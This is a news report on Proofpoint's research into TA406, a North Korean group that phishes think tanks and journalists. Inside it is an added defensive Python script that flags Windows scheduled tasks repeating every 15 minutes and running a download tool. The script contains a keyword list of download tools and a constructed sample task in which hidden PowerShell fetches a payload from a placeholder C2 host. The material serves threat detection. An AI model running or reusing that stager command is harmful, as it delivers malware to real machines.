A North Korean cyber espionage group known primarily for targeting think tanks, advocacy groups, journalists and others related to Pyongyang’s adversaries around the world has been quite prolific in 2021, according to email security firm Proofpoint.
The stepped-up action includes launching near-weekly attacks, among them two previously unreported campaigns.
In findings published Thursday, the firm examined the activities of a group it refers to as TA406, which it considers to be one of the components of an organization known more broadly as Kimsuky that’s been active since at least 2012. The U.S. government issued a public alert to the private sector in October 2020 about Kimsuky, warning of spearphishing, watering hole attacks and other methods designed to steal credentials.
TA406 targets research, education, government, media and other organizations for credential theft, Proofpoint analysts Darien Huss and Selena Larson wrote. The group’s other activities involve financial crimes and sextortion, and an increased use of malware. The campaigns remained “low in volume” until the beginning of January 2021, but starting then and through June 2021, the group launched “almost weekly campaigns,” the researchers wrote.
The first previously unreported campaign, in March 2021, used an email purportedly sent by Chad O’Carroll, an expert on North Korea and the CEO of Korea Risk, an analysis firm focused on North Korean issues. The email contained a link that sent the target to a domain controlled by the group, which hosted a legitimate news article about the March 21 North Korean missile tests.
The link also downloaded a file that would create a scheduled task that executed every 15 minutes to download a payload from a TA406-controlled server. Proofpoint analysts did not see what the follow-on payloads were, so it’s unclear what happened next.
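The 15-minute scheduled task described above is the kind of persistence a defender can hunt for in exported Task Scheduler definitions. The following is an added example, not code from Proofpoint or the report: it parses task XML (as produced by `schtasks /query /xml`) and flags tasks that repeat at a short interval and whose action can fetch content from the network. The task definitions, the download-hint list and the placeholder host are constructed for the example.

```python
import re
import xml.etree.ElementTree as ET
# Real Task Scheduler XML namespace (task definitions from `schtasks /query /xml`).
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Tokens in an action's command line that indicate it can fetch content from the network.
DOWNLOAD_HINTS = re.compile(r"(https?://|powershell|mshta|certutil|bitsadmin|curl|wget|"
                            r"iwr|invoke-webrequest|downloadstring|downloadfile)", re.I)

def iso_duration_minutes(value):
    """Convert an ISO 8601 duration such as PT15M or P1D to minutes (None if unparseable)."""
    m = re.fullmatch(r"P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?", value or "")
    if not m:
        return None
    d, h, mi, s = (int(x) if x else 0 for x in m.groups())
    return d * 1440 + h * 60 + mi + s / 60

def assess_task(xml_text, max_interval_minutes=15):
    """Flag a task that repeats at a short interval and runs a download-capable action."""
    root = ET.fromstring(xml_text)
    intervals = [iso_duration_minutes(e.text)
                 for e in root.findall(".//t:Repetition/t:Interval", NS)]
    intervals = [i for i in intervals if i is not None]
    shortest = min(intervals) if intervals else None
    cmdline = " ".join((e.text or "") for e in root.findall(".//t:Actions/t:Exec/*", NS))
    hints = sorted({h.lower() for h in DOWNLOAD_HINTS.findall(cmdline)})
    suspicious = shortest is not None and shortest <= max_interval_minutes and bool(hints)
    return {"shortest_interval_min": shortest, "download_hints": hints, "suspicious": suspicious}

# Constructed sample mirroring the reported behaviour: repeat every 15 minutes and
# fetch a payload from a placeholder host standing in for the attacker's server.
STAGER_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><TimeTrigger><Repetition><Interval>PT15M</Interval></Repetition>
    <StartBoundary>2021-03-22T09:00:00</StartBoundary><Enabled>true</Enabled>
  </TimeTrigger></Triggers>
  <Actions Context="Author"><Exec>
    <Command>powershell.exe</Command>
    <Arguments>-w hidden -c "iwr http://c2.example.invalid/stage -OutFile $env:TEMP\s.exe"</Arguments>
  </Exec></Actions>
</Task>"""

# Constructed benign sample: a daily backup job with no download capability.
BACKUP_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger><Repetition><Interval>P1D</Interval></Repetition>
  <StartBoundary>2021-01-01T02:00:00</StartBoundary></CalendarTrigger></Triggers>
  <Actions><Exec><Command>C:\backup\run.bat</Command></Exec></Actions>
</Task>"""

if __name__ == "__main__":
    print(assess_task(STAGER_TASK), assess_task(BACKUP_TASK))
```

Short repetition intervals alone are common in legitimate tasks, so the interval is combined with the action's download capability before a task is flagged.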
Relying on a legitimate news article hosted on an attacker-controlled domain or embedded in a document is a tactic the hackers previously used to deploy KONNI, a remote administration tool, the day after a North Korean missile test in 2017, the Proofpoint researchers note. KONNI has been used to target North Korea in the past, as well as Russia, Malwarebytes reported in August.
The second campaign, in June 2021, also purported to come from O’Carroll. That email contained an HTML attachment masquerading as an article preview. If clicked, the attachment displayed a fake error message with a button to save the document.
If the target downloaded the document, they were served a malicious Word file that sought to deploy a downloader Proofpoint calls “FatBoy,” which ultimately led to a script that could collect “extensive information” about the targeted device. The email also contained an invisible iframe that collected basic information about the target.
The report also highlighted a TA406 Windows keylogger that Proofpoint called “YoreKey,” and a deobfuscation service North Korea may have been using for financial gain. The service — “Deioncube” — was developed some time in 2020 and offered the ability to “decode the files encrypted with IonCube easily.” IonCube is software that encodes PHP scripts. Users could pay $10 to decode one file, or $500 for up to 500 files, payable in either bitcoin or ethereum cryptocurrencies. It’s unclear whether the service actually worked, the researchers wrote.
The researchers noted that the domain advertising the North Korean service was registered with the email address “donaldxxxtrump[@]yandex.ru,” which was also used to register several credential harvesting and malware campaigns in 2021.